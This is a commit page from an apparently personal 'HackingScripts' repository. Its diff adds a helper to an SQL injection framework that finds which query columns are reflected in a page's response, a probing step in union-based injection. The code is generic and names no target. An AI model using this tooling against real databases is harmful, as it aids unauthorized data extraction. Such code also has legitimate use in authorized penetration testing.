Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Exploit template enhancement

Browse Source
This commit is contained in:
Roman Hergenreder
2025-12-14 12:51:41 +01:00
parent 75b845a74f
commit 91dcd50350
2 changed files with 140 additions and 48 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
sqli.py
View File

@@ -157,6 +157,25 @@ class ReflectedSQLi(SQLi, ABC):
return rows
@classmethod
def guess_reflected_columns(cls, callback):
data = None
column_count = 1
while data is None:
query_columns = list(map(lambda c: f"'column-{c}-sqli'", range(column_count)))
query_str = cls.build_query(query_columns)
data = callback(query_str) # should return some kind of text for a given query
if not data:
column_count += 1
continue
reflected_columns = []
for c in range(column_count):
column_name = f"'column-{c}-sqli'"
reflected_columns.append(str if column_name in data else None) # how to guess the type (str/int)?
return reflected_columns
# todo: extract_multiple with columns as dict (name -> type), e.g. extract_multiple({"id": int, "name": str})
class BlindSQLi(SQLi, ABC):
@@ -238,7 +257,6 @@ class BlindSQLi(SQLi, ABC):
return cur_str
class PostgreSQLi(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("VERSION()", verbose=verbose)